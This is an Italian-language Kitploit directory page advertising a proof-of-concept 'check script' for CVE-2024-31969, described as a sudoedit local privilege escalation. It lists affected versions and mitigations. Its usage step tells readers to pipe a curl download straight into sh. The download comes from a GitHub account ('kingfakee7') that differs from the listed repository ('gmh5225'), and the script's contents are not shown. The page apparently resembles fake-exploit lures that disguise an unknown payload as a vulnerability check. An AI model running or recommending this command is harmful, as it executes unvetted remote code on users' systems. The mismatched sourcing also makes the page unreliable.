Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-31969 — Fornisce uno script di verifica proof-of-concept e documentazione per CVE-2024-31969, una escalation locale dei privilegi in sudoedit di sudo, incluse le versioni interessate e le indicazioni di mitigazione. | Kitploit
Strumenti/GitHubGitHub/gmh5225/cve-2024-31969
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitApprendimento e FormazioneRisorse Curate
GitHubgmh5225/cve-2024-31969

CVE-2024-31969

Fornisce uno script di verifica proof-of-concept e documentazione per CVE-2024-31969, una escalation locale dei privilegi in sudoedit di sudo, incluse le versioni interessate e le indicazioni di mitigazione.

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

📌 CVE-2024-31969

CVE-2024-31969 è una vulnerabilità di local privilege escalation in sudo quando si utilizza il comando sudoedit.

Questa vulnerabilità è stata introdotta a partire da sudo 1.9.0 a causa del modo in cui sudoedit valida le variabili d'ambiente dell'utente e la proprietà dei file in modo non corretto.


📖 Descrizione

Un difetto introdotto in sudo 1.9.0 nel modo in cui sudoedit validava le variabili d'ambiente degli utenti e la proprietà dei file.

Questa vulnerabilità consente a un utente locale con accesso a sudoedit di modificare file arbitrari come root tramite la manipolazione di variabili d'ambiente come SUDO_EDITOR, o sfruttando symlink.


📊 Versioni di Sudo Vulnerabili:

Versione SudoStato
1.9.0 → 1.9.15p4🔥 Vulnerabile
1.9.15p5 e successive✅ Sicuro
1.8.x (incluse 1.8.23)❌ Non vulnerabile

📦 Installazione e Utilizzo

Esegui il seguente comando:

root@kitploit:~
curl -L https://raw.githubusercontent.com/kingfakee7/CVE-2024-31969/main/cve-2024-31969-check.sh | sh

🛠️ Soluzione / Mitigazione

  • Aggiorna sudo alla versione 1.9.15p5 o successiva.
  • Limita le regole sudoers che consentono sudoedit agli utenti non root.
  • Utilizza una configurazione sicura di env_keep o env_reset nel file /etc/sudoers.

📚 Riferimenti

  • CVE-2024-31969 su NVD

⚠️ Disclaimer

Questo repository è stato creato a scopo educativo e di documentazione sulla sicurezza dei sistemi.
È severamente vietato utilizzare queste informazioni per attività illegali o senza autorizzazione scritta del proprietario del sistema.
Qualsiasi forma di uso improprio è completamente al di fuori della responsabilità dell'autore.

Scarica lo strumento